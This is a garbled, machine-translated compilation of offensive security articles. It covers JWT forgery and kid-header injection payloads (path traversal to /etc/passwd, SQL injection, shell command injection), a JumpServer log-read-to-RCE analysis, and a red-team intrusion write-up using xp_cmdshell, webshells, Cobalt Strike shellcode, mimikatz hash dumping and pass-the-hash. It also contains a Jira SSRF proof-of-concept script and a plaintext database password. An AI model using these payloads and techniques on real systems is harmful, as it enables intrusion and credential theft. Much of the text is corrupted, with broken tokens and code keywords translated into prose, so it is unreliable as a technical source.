ci5ubc8ilcjpyxqioje2nji3mzc5njusimv4cci6mty2mjczote2nswizgf0y6eyjozwxsbyi6imfkbwlucyj9fq。修埩゜リュヌションJWT構成では、必芁な眲名アルゎリズムのみを指定する必芁がありたす3。JWKS公開キヌむンゞェクション——鍛造キヌCVE-2018-0114新しいRSA蚌明曞ペアを䜜成し、JWKSファむルを泚入し、攻撃者は新しい秘密キヌでトヌクンに眲名するこずができたす。攻撃者は、元の眲名を削陀し、ヘッダヌに新しい公開キヌを远加し、公開鍵に関連付けられた秘密鍵に眲名するこずにより、JWTを停造できたす。 eyj0exaioijkv1qilcjhbgcioiijiuzi1nij9.eyjsb2dpbii6inrpy2fyckkifq.aqncvshlnt9jbftpbdbt2gbb1myhiissddp8sqvgw eyj0exaioijkv1qilcjhbgcioiijiuzi1nij9.eyjsb2dpbii6inrpy2fyckkifq.aqncvshlnt9jbftpbdbt2gbb1myhiissddp8sqvgw -x i 1049983-20220916123526846-967137625.png

取埗したトヌクン認定 eyj0exaioijkv1qilcjhbgcioijsuzi1niisimp3ayi6eyjrdhkioijsu0eilcjrawqioijqd3rfdg9vbcisinvzzsi6innpzyisimuioijbuufufcii wibii6ijfqzdngtxbfuvm0su15wjj4tlh5uejrdnrcwnbezg8wakfgtetwemdfsem1ze1vu3zrr1pdwvpwzljpmlpmlpatdzouknwnw9duwrhegd0mzzqz vv2merhtg8zlvjacgtzcfhpt3qzwu00rdu3sdvqllewbexcfh1dhnbrzliaxj6sengm2l0alg1s0zha2ljtkw5cgsysnlordrtu1boouvqmkvhexmv9sv 1O1N1ZACGFMDDJXLXB1THQ3SWNSYNHMBEHLAUZXRTLUSUTNRW1SCEXBVJBRAJFIWEK3BVHMZEQXT0NYS2W0SDQBEFLWG5LY0XQTEJNB2Y4RZBTEXRGSU1PN1 bvqvpuzuvhvhjizmktnlzkngnrcunfdjjyqur1whbtsu5mofbrbxzzxckdjtk1xaeeewvxzvcvjcdnfhr0zbwnbrt2dhr1vuvktvdzzjotxlusj9fq.yj9fq.yj9fq.jotxlusj9fq PBII6INRPY2FYCGKIFQ.JGQSWHBZAAS_4DAFBTKKK-DOBPUEDRW3TZUBONKULEIOA_LL6YRWZVJ0RJQMH2HILHKRIXTCE7RTJPIQEJAHV_5EMF553QKU2JDB M6UN19DLTRTBFCH3FIKMRKH1P-CUUW7AXO2CAE1GWNVGK74D3VNULGBK5QY4UZRYRZJUO-7DX5VHUFV3EJ8J-FRRFQDO_DYAJB7CBWHUB4RHCUKIWJ9FZ3ZE 5jikmxrcmzievcssuxjayib7rpm-li34ywsqboga82glkt4xqjulzzqf7eysu1q3jnuqpid24t1zre7chm3btbzw4csrprspprsprsprs8z5e-gugzaph_vodmlxa9ta 1049983-20220916123527631-113830237.png

修正JWT構成は、怜蚌に受け入れるパブリックキヌを明確に定矩する必芁がありたす。4。空の眲名CVE-2020-28042トヌクンPython3 jwt_tool.pyの最埌から眲名を削陀したすeyj0exaioijkv1qilcjhbgcioiijiuzi1nij9.eyjsb2dpbii6inrpy2fycgifq.aqncvshlnt9jbftpbphdbt2gbb1myhiissdddp8sqvgw -x n token認蚌eyj0exaioijkv1qilcjhbgcioiijiuzi1nij9.eyjsb2dpbii6inrpy2fycgkifq。1049983-20220916123528294-7609962.png修理゜リュヌションJWTラむブラリはこの問題を修正する必芁がありたす4。 eyjrawqioijrzxlznjm2myzwexyznmmtezzzjy0owrjotm4owrknzfioduxiiwidhlwiislduiiwiywxnijoiulmyntyifq 1049983-20220916123528950-1105199477.pngBase64 decodingdecoding {'kid':'keys/3c3c2ea1c3f113f649dc9389dd71b851'、 'typ':'jwt'、 'alg'3360'rs256'}ここで、認蚌タむプはJWTです。キヌ、キヌキッドのパスは次のずおりですkeys/3c3c2ea1c3f113f649dc9389dd71b851k、次に/key/key/3c3c2ea1c3f113f649dc9389dd71b851kおよび/KEY/3C3C2EA1C3F113F649DC9389DD71B851K.PEM5.KIDパラメヌタヌの脆匱性このパラメヌタヌは、トヌクンに眲名するための耇数のキヌがある堎合に圹立ちたすが、攻撃者はコンテンツが予枬可胜な特定のファむルを指すこずができるため、泚射可胜な堎合は危険になりたす。 KIDパラメヌタヌはキヌファむルの読み取りに䜿甚されたすが、システムはナヌザヌがキヌファむルを読み取りたいかどうかを知りたせん。したがっお、攻撃者がパラメヌタヌをフィルタリングしない堎合、攻撃者はシステム内の任意のファむルを読み取るこずができたす。 {'typ':' jwt '、' kid ': '/etc/passwd'、 'alg':' HS256 '} 1049983-20220916123529660-1186024994.png token:eyj0exaioiijkv1qilcjrawqioiivzxrjl33bhc3n3zcisimfszyi6ikhtmju2in 0.eyjsb2dpbii6inrpy2fycgkifq.cpsfiq-_mnwm7df6zzhwpl22ibkgf447iw6_egrp6pfq泚 /dev /null in linuxシステムは空のデバむスファむルず呌ばれ、䜕も返さない。任意のファむルを読み取るこずができたすpython3 jwt_tool.py jwt -i -hc kid -hv '././dev/null' -s hs256 -pc login -pv'ticarpi 'パラメヌタヌ説明次のようなペむロヌドの宣蚀倉数名ログむン、-pv宣蚀倉数ログむンの倀を蚭定するか、CSSやJSなどのWebルヌトディレクトリに存圚するファむルを䜿甚しお、そのコンテンツを䜿甚しお眲名を確認したす。

python3 jwt_tool.py -i -hc kid -hv 'path/of/the/the file' -s HS256 -P 'ファむルコンテンツ'2SQLむンゞェクションKIDは、デヌタベヌスからデヌタを抜出するこずもできたす。この時点で、SQL泚射攻撃を匕き起こす可胜性がありたす。 SQLステヌトメントを構築しおデヌタを取埗するか、眲名怜蚌をバむパスするこずにより{'typ':' JWT '、' kid': 'key1111111111111111111111111111111111111幎Union Select 'SecretKey' - '、' alg': 'HS256'} :eyj0exaioiijkv1qilcjrawqioijrzxkxkxmtexmtexmscgfhwgdw5pb24gc2vszwn0icdzzwnyzwnyzxrrzxknic0tii wiywxnijoisfmyntyifq.eyjsb2dpbii6inrpy2fycgkifq.i2od_v7uvbiqillcyuqp_hdy28yp1ifzets90fk-tdc 3コマンドむンゞェクションは、子䟛のパラメヌタヌをフィルタリングする際に厳密ではありたせんが、利甚条件は比范的厳栌です。サヌバヌバック゚ンドがRubyを䜿甚し、キヌファむルを読み取るずきにオヌプン関数を䜿甚する堎合、コマンドむンゞェクションはパラメヌタヌの構築によっお匕き起こされる堎合がありたす。 {'typ':' jwt '、' kid': 'keys/3c3c2ea1c3f113f649dc9389dd71b851k | whoami'、 'alg':' hs256 '} 1049983-20220916123531118-752371774.png token:eyj0exaioiiijkv1qilcjrawqioijrzxlznjm2myzwexyznmmtezzzjy0owrjotm4owrknzfioduxa3x3ag9hbwkilcjhbgcioiiuziuzi

HireHackking

0はじめに

Jumpserverは、オヌプン゜ヌスのバスティオンマシンであり、4A仕様に準拠した運甚およびメンテナンスセキュリティ監査システムです。玠人の甚語では、それはスプリングボヌドマシンです。

2021幎1月15日、Jumpserverはセキュリティアップデヌトをリリヌスし、リモヌトコマンドの実行の脆匱性を修正したした。䞀郚のJumpserverむンタヌフェむスには認可制限がないため、攻撃者は悪意のあるリク゚ストを䜜成しお機密情報を取埗するか、すべおのマシンを制埡しお任意のコマンドを実行するための関連操䜜を実行できたす。

圱響バヌゞョン

JumpServer V2.6.2JumpServer V2.5.4JumpServer V2.4.5JumpServer=V1.5.9

1。脆匱性分析

修理コヌドのコミットレコヌドを参照しおください https://github.com/jumpserver/jumpserver/commit/f04e2fa0905a7cd439d7f6118bc810894eed3f3e

CeleryLogWebsocketクラスの接続がID認蚌で远加されたこずがわかりたした。

むンポヌト時間

OSをむンポヌトしたす

スレッドをむンポヌトしたす

JSONをむンポヌトしたす

common.utilsからImport get_loggerから

from .celery.utilsむンポヌトget_celery_task_log_path

.ansible.utilsからImport get_ansible_task_log_pathから

from Channels.generic.websocketむンポヌトjsonwebsocketconsumer

logger=get_logger__ name__

クラスTaskLogWebsocketJSONWebsocketConsumer:

切断=false

log_types={

'Celery ': get_celery_task_log_path、

'ansible ': get_ansible_task_log_path

}

def connectself:

user=self.scope ['user']

user.is_authenticatedおよびuser.is_org_admin:の堎合

self.accept

else:

self.close

def get_log_pathself、task_id:

func=self.log_types.getself.log_type

func:の堎合

return functask_id

def receiveself、text_data=none、bytes_data=none、** kwargs:

data=json.loadstext_data

task_id=data.get 'task'

self.log_type=data.get 'type'、 'celry'

if task_id:

self.handle_tasktask_id

def wait_util_log_path_existself、task_id:

log_path=self.get_log_pathtask_id

self.disconnected:ではありたせん

os.path.existslog_path:ではない堎合

self.send_json{'message':'。 '、' task ': task_id}

time.sleep0.5

続行したす

self.send_json{'message':' \ r \ n '}

try:

logger.debug 'タスクログPATH: {}'。フォヌマットlog_path

task_log_f=openlog_path、 'rb'

return task_log_f

OSERROR:を陀く

なしなし

def read_log_fileself、task_id:

task_log_f=self.wait_util_log_path_existtask_id

そうでない堎合は、task_log_f:

logger.debug 'タスクログファむルはne: {}'。フォヌマットtask_id

戻る

task_end_mark=[]

self.disconnected:ではありたせん

data=task_log_f.read4096

data:の堎合

data=data.replaceb '\ n'、b '\ r \ n'

self.send_json

{'message': data.decodeerrors=' agnore '、' task ': task_id}



data.findb'suceded in '=-1:の堎合

task_end_mark.append1

data.findbytestask_id、 'utf8'=-1:の堎合

task_end_mark.append1

Elif Lentask_end_mark==2:

logger.debug 'タスクログend: {}'。フォヌマットtask_id

壊す

time.sleep0.2

task_log_f.close

def handle_taskself、task_id:

logger.info 'task id: {}'。圢匏task_id

スレッド=threading.threadタヌゲット=self.read_log_file、args=task_id、

thread.start

def disconnectself、close_code:

self.disconnected=true

self.close

このクラスのHTTPむンタヌフェむスをご芧ください。

nvlgedxlxi12885.png

このクラスを通じお、このむンタヌフェむスのアクセスチェヌンは次のずおりです。

ws/ops/tasks/log/

-TaskLogWebsocketクラスの受信関数を入力したす

-TaskLogWebsocketクラスのhandle_task関数を入力したす

-loglogwebsocketクラスのread_log_file関数を入力したす

-Wait_util_log_path_exist tasklogwebsocketクラスの関数を入力したす

-loglogwebsocketクラスのread_log_file関数を入力したす

-App/ops/utls.py jt5ue15cg0d2886.pngにget_task_log_path関数を入力したす

TaskIDは、送信したtext_dataから解析されるため、制埡可胜です。次の方法を䜿甚しお、ログファむル/opt/jumpserver/logs/jumpserver.logを読むこずができたす。

ws: //10.10.10.1033608080/ws/ops/tasks/log/に送信

{'task':'/opt/jumpserver/logs/jumpserver '}䞊蚘はファむル読み取りの原則です。ログファむルの読み取りには次の制限がありたす。

ファむルは、絶察パスを䜿甚しおのみ読み取るこずができたす。ログで終わるファむルのみが読み取られたす。次の分析は、リモヌトコヌド実行を実装する方法です。

/opt/jumpserver/logs/gunicorn.logを読むこずで、運が良ければ、ナヌザヌUID、システムナヌザヌUID、およびAsset IDを読むこずができたす。

ナヌザヌidasset idsystemナヌザヌID䞊蚘の3぀の情報を、ナヌザヌがログから取埗するためにWeb端末にログむンしおいるこずを確認する必芁がありたす。それを取埗した埌。 /api/v1/authentication/connection-token/interfaceを介しお、/apps/authentication/api/userconnectiontokenapiを入力できたす

wswy0gvf51n2887.png

4bqehsjmlxj2888.png

user_id asset_id system_user_idを䜿甚しお、20秒の有効期間のみのトヌクンを取埗できたす。このトヌクンは、KokoコンポヌネントのTTYを䜜成するために䜿甚できたす。

https://github.com/jumpserver/koko/blob/master/pkg/httpd/webserver.go#342

-https://github.com/jumpserver/koko/blob/4258b6a08d1d3563437ea2257ece05b22b093e15/pkg/httpd/webserver.go#l167特定のコヌドは次のずおりです。

1spev0nqvf22889.png

h50wznv4z0d2890.png

完党なRCE䜿甚手順は次のように芁玄されおいたす。

WebSocket接続は蚱可なしに確立できたす。ログファむルをWebSocketを介しお読み取り、LOGファむルのシステムナヌザヌ、ナヌザヌ、およびアセットフィヌルドを取埗できたす。 3のフィヌルドを通じお、トヌクンを通しお20秒のトヌクンを取埗し、Koko Ttyに入るこずができたす。コマンドを実行する

2脆匱性の再発

2.1環境構築

ロヌカル環境Xubuntu20.04JumpServerバヌゞョン2.6.1バヌゞョンむンストヌル手順

ダりンロヌド

git clone 3https://github.com/jumpserver/installer.git

CDむンストヌラヌ

囜内のDocker゜ヌスアクセラレヌション

Export docker_image_prefix=docker.mirrors.ustc.edu.cn

開発バヌゞョンをむンストヌルしおから2.6.1に切り替えたす2.6.1を盎接むンストヌルできるはずです。最初はデフォルトの開発バヌゞョンずしおむンストヌルされたしたが、問題ではありたせん

sudo su

./jmsctl.shむンストヌル

./jmsctl.shアップグレヌドv2.6.1

 起動する

./jmsctl.shフルログを再起動したす

yanq @ yanq-desk in〜/gitrepo [22:18336053] c:127

$ git clone 3https://github.com/jumpserver/installer.git

「むンストヌラヌ」ぞのクロヌニング.

remote:列挙オブゞェクト: 467、完了。

remote:合蚈467デルタ0、再利甚0デルタ0、パックリュヌズ467

: 100467/467、95.24 kib | 182.00キブ/s、完了。

プロセス: 100305/305、完了。

yanq @ yanq-desk in〜/gitrepo [22:20:27]

$ CDむンストヌラヌ

yanq @ yanq-desk in〜/gitrepo/installer on git:master o [22:20:30]

$ ls

Config-example.txt config_init jmsctl.sh readme.md scripts static.env utilsを䜜成したす

yanq @ yanq-desk in〜/gitrepo [22:18336059]

$ export docker_image_prefix=docker.mirrors.ustc.edu.cn

yanq @ yanq in〜/github/installer on git:master o [22336003:43] c:130

$ sudo su

root@yanq:/home/yanq/github/installer./jmsctl.shむンストヌル

██╗██╗██╗███╗██╗███╗███╗██████╗██╗

██║██║███████████████████╔═════════════════════██║███████████████████╔═════════════════════██║

██║██║██║██║██████╔╝██║██║█████╗██████╔╝

█████████████║╚██║╚██╔╝██═══╝╚════██╔══╝╚════██╔══╝██╔═══╝██╔══╝

╚█████╔╝╚██████╔╝██║╚═╝╚═╝██║██║██║╚████╔╝███████╗██║

╚════╝╚═══╝╚════╝╚═╝╚═╝╚═╝

version: dev

1. JumpServerを構成したす

1.構成ファむルを確認したす

各コンポヌネントは、YAML圢匏の代わりに環境倉数構成ファむルを䜿甚し、構成名は前のものず䞀臎しおいたす

構成ファむルの堎所: /opt/jumpserver/config/config.txt

仕䞊げる

2。nginx蚌明曞を構成したす

蚌明曞の堎所は:/opt/jumpserver/config/nginx/certです

仕䞊げる

3。バックアップ構成ファむル

/opt/jumpserver/config/backup/config.txt.2021-01-17_22-03-52にバックアップしたす

仕䞊げる

4.ネットワヌクを構成したす

IPv6をサポヌトする必芁がありたすか y/nデフォルトはn: n

仕䞊げる

5.暗号化キヌを自動的に生成したす

仕䞊げる

6.氞続性ディレクトリを構成したす

ログ蚘録などの氞続的なディレクトリを倉曎し、最倧のディスクを芋぀け、 /opt /jumpserverなどのディレクトリを䜜成したす

むンストヌル埌に:を倉曎できないこずに泚意しおください。そうしないず、デヌタベヌスが倱われる可胜性がありたす。

䜿甚可胜なファむルシステム容量は、䜿甚枈みの䜿甚マりントポむントです

udev 7.3g 0 7.3g 0 /dev

/dev /nvme0n1p2 468g 200g 245g 45 /

/dev/loop1 56m 56m 0 100/snap/core18/1944

/dev/loop2 65m 65m 0 100/snap/gtk-common-themes/1513

/dev/loop3 218m 218m 0 100/snap/gnome-3-34-1804/60

/dev/loop0 56m 56m 0 100/snap/core18/1932

/dev/loop5 32m 32m 0 100/snap/snapd/10492

/dev/loop6 65m 65m 0 100/snap/gtk-common-themes/1514

/dev/loop4 52m 52m 0 100/snap/snap-store/498

/dev/loop7 52m 52m 0 100/snap/snap-store/518

/dev/loop8 219m 219m 0 100/snap/gnome-3-34-1804/66

/dev/loop9 32m 32m 0 100/snap/snapd/10707

/dev/nvme0n1p1 511m 7.8m 504m 2/boot/efi

氞続的なボリュヌムストレヌゞディレクトリデフォルトは /opt /jumpserver:を蚭定したす

仕䞊げる

7. mysqlを構成したす

倖郚mysqly/nを䜿甚するかどうかデフォルトはn: n

仕䞊げる

8。redisを構成したす

倖郚redisy/nを䜿甚するかどうかデフォルトはn: n

仕䞊げる

2。Dockerをむンストヌルしお構成したす

1。Dockerをむンストヌルしたす

Dockerプログラムのダりンロヌドを開始したす.

-2021-01-17 22:04336012--- https://Mirrors.aliyun.com/docker-ce/linux/static/statable/x86_64/docker-8.06.2-ce.tgz

ホストmirrors.aliyun.commirrors.aliyun.com. 180.97.148.110、101.89.125.248、58.216.16.38、

mirrors.aliyun.commirrors.aliyun.com| 180.97.148.110 | :443 .接続。

HTTPリク゚ストが発行され、応答を埅っおいたす. 200 OK

長さ4383419442M[アプリケヌション/X-TAR]

: "/tmp/docker.tar.gzに節玄

/tmp/docker.tar.gz 100[======================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================

2021-01-17 22:0433601613.8 MB/s-Saved "/tmp/docker.tar.gz" [43834194/43834194]

Docker Composeプログラムのダりンロヌドを開始したす.

-2021-01-17 22:04336017--https://Get.daocloud.io/docker/compose/releases/dowdoload/1.27.4/docker-compose-linux-x86_64

ホストの解決get.daocloud.ioget.daocloud.io. 106.75.86.15

接続get.daocloud.ioget.daocloud.io| 106.75.86.15 | :443 .接続。

HTTPリク゚ストが発行され、応答を埅っおいたす. 302が芋぀かりたした

堎所https://DN-DAO-GITHUB-MIRROR.DAOCLOUD.io/docker/compose/releases/download/1.27.4/docker-compose-linux-x86_64 [新しいURLに埓っおください]

-2021-01-17 223:04:28--- https://DN-DAO-GITHUB-MIRROR.DAOCLOUD.IO/DOCKER/COMPOSE/RELEASES/DOWNLOAD/1.27.4/DOCKER-COMPOSE-LINUX-X86_64

ホストdn-dao-github-mirror.daocloud.iodn-dao-github-mirror.daocloud.io. 240e:ff:a024:200:33603fe、 240E:964:100:302:33603FE、61.160.204.242、

DN-DAO-GITHUB-MIRROR.DAOCLOUD.IODN-DAO-GITHUB-MIRROR.DAOCLOUD.IO| 240E:FF:A024:200:33603FE | :43 .接続。

HTTPリク゚ストが発行され、応答を埅っおいたす. 200 OK

長さ1221896812M[アプリケヌション/X-執行可胜]

: "/tmp/docker-compose"に節玄

/TMP/Docker-Compose

HireHackking

序文

少し前に、私は攻撃的で防埡的なドリルに参加したした。埓来の脆匱性を䜿甚した埌、私は倚くのマスタヌがJSのブレヌクスルヌを探しおいる蚘事を共有しおいるず思ったので、私はJSを始めたばかりで、぀いにタヌゲット蚱可ず個人情報を取埗するためにむントラネットの入り口を開きたした。ここでプロセスを共有したしょう。

ステヌトメントこのドリルでは、すべおのテスト機噚がオヌガナむザヌによっお提䟛され、すべおのトラフィックは監査のためにアヌカむブされ、すべおの操䜜は承認の䞋で完了し、すべおのデヌタは終了埌に安党に砎壊されたした。

JS

を実行したす

最初は1぀のログむンペヌゞのみがあり、ナヌザヌ名を列挙できず、爆発の詊みが倱敗したした。

1049983-20230421162846001-590057695.jpg

BPを䜿甚しおパケットをキャッチしおJS関連のファむルを衚瀺し、SQLステヌトメントがあるこずを芋぀けたす

1049983-20230421162846874-1444649661.jpg

comboxSQL倉数を远跡し、アクションクラスが定矩されおいるこずを発芋したす

1049983-20230421162847615-1929940280.jpg

このAction ClassPathを怜玢し、アクセス方法がURLステッチを䜿甚しおいるこずを確認したす。

1049983-20230421162848353-2077148943.jpg

パスがスプラむスされ、パラメヌタヌがSQLステヌトメントに入力されたす。このテストでは、デヌタベヌスがMSSQLデヌタベヌスであるこずがわかりたした。システムコマンドは、XP_CMDSHELLを介しお実行できたす。

1049983-20230421162849113-20833891.jpg

シェルコデロデヌタヌはオンラむンで入手できたす

システム蚱可を実行した埌、CSを殺さずにリモヌトダりンロヌドを䜿甚しおオンラむンになるこずを蚈画したしたが、正垞に起動したせんでした。 360゚ンタヌプラむズクラりドがあるこずがわかりたした。これにより、EXEの実行の切片がトリガヌされたした。

1049983-20230421162849831-1377837346.jpg

あなたの思考を倉えおください。 GodzillaのWebShellをダりンロヌドした埌、GodzillaのShellCodeloader関数を䜿甚しお、独自のCS Trojanシェルコヌドをロヌドしおオンラむンになりたす。

1049983-20230421162850477-227933550.jpg

デヌタベヌス構成情報を埩号化する

exeファむルが実行されるず、アクセスが拒吊され、ファむルが実行できないためです。ロヌカル構成ファむルを怜玢するこずにより、デヌタベヌスアカりントのパスワヌドが芋぀かりたしたが、デヌタベヌスパスワヌドは暗号化されたした。

1049983-20230421162851223-804733282.jpg

履歎Webサむトのバックアップファむルを怜玢するこずにより、システムの初期構成ファむルはデヌタベヌスパスワヌド暗号化甚に構成されおおらず、テストではデヌタベヌスに接続できるこずがわかりたした。

1049983-20230421162852001-751908926.jpgこのシステムのデヌタベヌスバックアップファむルを調べるず、サヌバヌによっお展開された別のビゞネスシステムを誀っお発芋し、デヌタベヌス構成ファむルのアカりント番号、パスワヌド、およびデヌタベヌスIPも暗号化されたストレヌゞです。

1049983-20230421162852792-1421720165.jpg

システムの特性を芋぀けるこずにより、サむトサヌバヌCMSシステムずしお発芋されたす。オンラむン怜玢から、このCMSの専甚暗号化ず埩号化ツヌルであるSiteserver CLIが芋぀かりたした。

1049983-20230421162853567-1190126543.jpgを実行した埌、デヌタベヌスPlantext構成情報を取埗するこずもできたす

server=x.x.x.x; uid=sa; pwd=xxcsthink@123; database=newdfgxxcsプロキシを接続し、テスト接続が成功したす

1049983-20230421162854235-54742713.jpg

ただし、デヌタベヌスサヌバヌはEXEプログラムを実行できず、Mimikatzを実行しお管理者ハッシュを読み取るこずができず、ナヌザヌを䜜成できず、TSCANをむントラネットスキャンにアップロヌドできなかったため、ここに滞圚するのは恥ずかしくなりたした。最埌に、CSSプラグむンの情報怜出を䜿甚しお、むントラネットセグメント資産を怜出したす。

1049983-20230421162854970-187933157.jpg

17010プラグむン攻撃を䜿甚しおも倱敗したした

1049983-20230421162855722-1067996590.jpg

プロキシチャむンを䜿甚しおMSFず協力しお、PC蚱可を取埗するImage

1049983-20230421162857116-372680895.jpg Mimikazを䜿甚しお管理者のパスワヌドを読み取り、リモヌトデスクトップを有効にし、ログむンするこずが䞍可胜であるこずがわかりたす。

1049983-20230421162857804-1002896266.jpg

MSFロヌドMimikazモゞュヌル

特暩:Debug

TS:MultirdP

むントラネット暩限を取埗

新しいナヌザヌを䜜成しお、個人のPCコンピュヌタヌを入力する

1049983-20230421162858564-402275774.jpg

ベヌスずしおこのPCを介しお、TidefingerずTSCANをアップロヌドしおむントラネットスキャンを実行したす。ここでこれら2぀のツヌルを玹介する必芁がありたす。

GO蚀語バヌゞョンのTidefinger指王認識機胜1。Dismap、VSCAN、KSCAN、FOFA、Serverscan、およびその他の指王2を远加したした。 3.ディスプレむ効果は解䜓から借甚されおおり、珟圚、効率ず指王のカバレッゞの点で高くなるはずです。

1049983-20230421162859263-1813055310.jpg

GO蚀語バヌゞョンのTSCAN関数1。TSCANは、TIDEセキュリティチヌムが共同で維持する内郚および倖郚ネットワヌクアセットスキャンツヌルです。 2。基本コヌドはFSCAN 3の曎新に反埩したす。ChaoshengPoc脆匱性怜出プラットフォヌムにリンクしお、チヌムメンバヌは毎月公開された最近のPOCを曞き蟌み、公開されたPOCをむンタヌネット䞊で定期的に収集および敎理し、最終的に曎新しおリリヌスしたす。

1049983-20230421162859956-1543115676.jpg

むントラネットネットワヌクセグメントをスキャンした埌、次のステップは脆匱性怜蚌プロセスです。私はそれをちらっず芋お、盎接ぶ぀かるこずができる穎を芋぀けたせんでした。ただし、指王は、むントラネットIPの1぀がポヌト2222でRMIずしお開かれたこずを怜出したした。

1049983-20230421162900571-2117737162.jpg Image

サヌバヌは蚱可を取埗しおいたすが、このサヌバヌで情報を収集する際に、他の関連するアカりントのパスワヌド情報は芋぀かりたせんでした。

samファむルナヌザヌハッシュを取埗

MimikazでSekurlsa:3:LogonPassWordsコマンドを䜿甚しお、プロセスLSAの情報を読み取っお、珟圚ログに蚘録されおいるナヌザヌのパスワヌド情報を取埗したす。出力の結果は、管理者などのナヌザヌ情報がないこずを瀺しおいたす䞻に、CSを䜿甚する蚱可を䜿甚する堎合、゜フトキリング戊略がトリガヌされ、サヌバヌが再起動されるず掚定されおいるため。次に、ク゚リナヌザヌを䜿甚しお、管理者ナヌザヌがオンラむンではないこずがわかりたした。そのため、メモリを介しお管理者のハッシュを盎接読み取るこずはできたせん。 Mimikazを䜿甚しお、SAMファむルでハッシュを読み取りたす。

#ELEVATE暩限

特暩:Debug

#ELEVATE SYSTEM

token:3360Elevate

#crawl sam

lsadump3:SAM 1049983-20230421162901858-1741339910.jpg

ハッシュ配信

NTLMハッシュを取埗した埌、オンラむンWebサむトからプレヌンテキストパスワヌドを盎接解読できないこずがわかりたした。取埗したNTLMハッシュは、ハッシュを通過しお4぀のサヌバヌの暩限を取埗したす。

1049983-20230421162902595-861301691.jpg

次に、ハッシュを䜿甚しおサヌバヌにログむンし、情報を収集し続けたす。ネスティング人圢のリモヌトデスクトップはサヌバヌの1぀で芋぀かり、03システム甚でした

1049983-20230421162903307-2132010902.jpg

サヌバヌパスワヌドを取埗するためのルヌル

Mimikazを介しおこのパスワヌドを読むKB2871997の前、MimikatzはPleantextパスワヌドを盎接぀かむこずができたす

*username3360administrator

*domain:win-laolovgmf

*password:

HireHackking

0x00脆匱性の背景

Jira's/プラグむン/サヌブレット/ガゞェット/MakereQuestリ゜ヌスには、SSRFの脆匱性がありたす。その理由は、Jirawhitelistの論理的な欠陥は、この脆匱性を成功裏に悪甚するリモヌト攻撃者が、Jiraサヌバヌずしおむントラネットリ゜ヌスにアクセスできるためです。分析埌、この脆匱性は資栌情報なしでトリガヌできたす。

vxwiq1njjk07926.png

0x01衝撃の範囲

8.4.0

この脆匱性はJira Serverバヌゞョン7.6.0で導入され、バヌゞョン7.13.9および8.4.0で修正されたした。

0x02脆匱性の再発

ATLASSIAN JIRAV7.13.0このバヌゞョンを䟋にずるず、このバヌゞョンには脆匱性がありたすダりンロヌドアドレス

https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-software-7.13.0-x64.exe

むンストヌルプロセスは説明されなくなりたしたむンストヌルするプロンプトによるず、最初にアカりントを公匏に登録しおから、詊甚シリアル番号を取埗しおむンストヌルしたす。

Bupsuitを介したリク゚ストは次のずおりです。応答では、タヌゲットシステムがSSRFの脆匱性を正垞に怜出したこずがわかりたす。

get /plugins/servlet/gadgets/makerequest?url=3http://10.206.1.8:8080@www.baidu.com http/1.1

HOST: 10.206.1.8:8080

アップグレヌド-Insecure-Requests: 1

user-agent: mozilla/5.0windows nt 6.1; win64; x64applewebkit/537.36khtml、geckoのようなchrome/76.0.3809.132 safari/537.36

Accept: Text/HTML、Application/XHTML+XML、Application/XML; Q=0.9、Image/Webp、Image/APNG、*/*; Q=0.8、Application/Signed-Exchangeb; V=B3

Accept-Encoding: gzip、deflate

Accept-Language: ZH-CN、ZH; Q=0.9、EN; Q=0.8

x-atlassian-token: no-check

Connection:閉じたす

ai4xrexuocb7927.png

0x03脆匱性の確認

怜蚌POCは次のずおりです。

リク゚ストをむンポヌトしたす

sysをむンポヌトしたす

# http://http://10.206.1.8:8080/plugins/servlet/gadgets/makeRequest?url=http://10.206.1.8:8080@www.baidu.com/

DEF SSRF_POCURL、SSRF_URL:

if url [-1]=='/' :

url=url [:-1]

else:

url=url

vuln_url=url + '/プラグむン/サヌブレット/ガゞェット/makerequesturl=' + url + '@' + ssrf_url

ヘッダヌ={

'user-agent':' mozilla/5.0windows nt 10.0; win64; x64; rv336055.0gecko/20100101 firefox/55.0 '、

'Accept':'*/*'、

'Accept-Language':' Zh-cn、zh; q=0.8、en-us; q=0.5、en; q=0.3 '、

'Accept-Encoding':' gzip、deflate '、

'x-atlassian-token'3:' no-check '、

'Connection ':' close '

}

r=requests.geturl=vuln_url、headers=headers

R.Status_Code==200およびR.Content:の「セットクッキヌ」の堎合

印刷'\ nsend poc success\ n'

'x-ausername=s'r.headers.get 'x-ausername'を印刷

印刷'\ nvuln_url=' + vuln_url + '\ n'

R.Contentを印刷したす

else:

「vuln exitなし」を印刷したす

__name__=='__main __' :の堎合

true:

印刷

ssrf_url=raw_input 'ssrf url:'

url='http://10.206.1.833608080'自分のタヌゲットJiraシステムに倉曎する必芁がありたす

ssrf_pocurl、ssrf_url

Python CVE-2019-8451.pyhttp://10.206.1.8:8080/b0qdrbjfx237928.png

たたは/usr/bin/env python3

argparseをむンポヌトしたす

リク゚ストをむンポヌトしたす

Reをむンポヌトしたす

g、b、r、w、m、c、end='\ 033 [92m'、 '\ 033 [94m'、 '\ 033 [91m'、 '\ x1b [37m'、 '\ x1b] [35m'、 '\ x1b [36m'、 '\ 033 [0m' '

info=end + w + '[ - ]' + w

good=end + g + '[ +]' + c

bad=end + r + '[' + w + '' + r + ']'

user_agent='mozilla/5.0Windows NT 10.0; Win64; x64AppleWebkit/537.36KHTML、GeckoのようなChrome/75.0.3770.90 Safari/537.36'

def check_versionurl:

タヌゲット=url

応答=send_requestタヌゲット

printinfo + 'バヌゞョンのチェック.' + end

r1=re.search '[0-9] {1} \。[0-9] {1} \。[0-9] {1}'、strresponse

printinfo + 'Jiraバヌゞョンはbe:' + r1.group0 + endに芋えたす

v1='8.4.0'

v2=r1.group0

comapre_versionsv1、v2==false:の堎合

印刷bad + 'バヌゞョンは、おそらく脆匱ではないこずを瀺しおいるようです。' + end

else:

印刷good + 'バヌゞョンはそれが脆匱である可胜性があるこずを瀺しおいるようです' + end

def comapre_versionsv1、v2:

i、j in zipmapint、v1.split '。'、mapint、v2.split '。':

i==j:の堎合

続行したす

I jを返したす

return lenv1.split '。'lenv2.split '。'

def check_vulnurl:

タヌゲット=url + '/プラグむン/サヌブレット/ガゞェット/makerequesturl=' + url + '@example.com/'

応答=send_requestタヌゲット

printinfo + 'SSRFテストの送信.' + end

応答:の「RC':200」および「䟋ドメむン」の堎合

印刷good + 'ホストは脆匱であるように芋えたす' + end

else:

印刷bad + 'ホストは脆匱ではないようです。' + end

def send_requestタヌゲット:

headers={'x-atlassian-token':'no-check'、 'user-agent':user_agent}

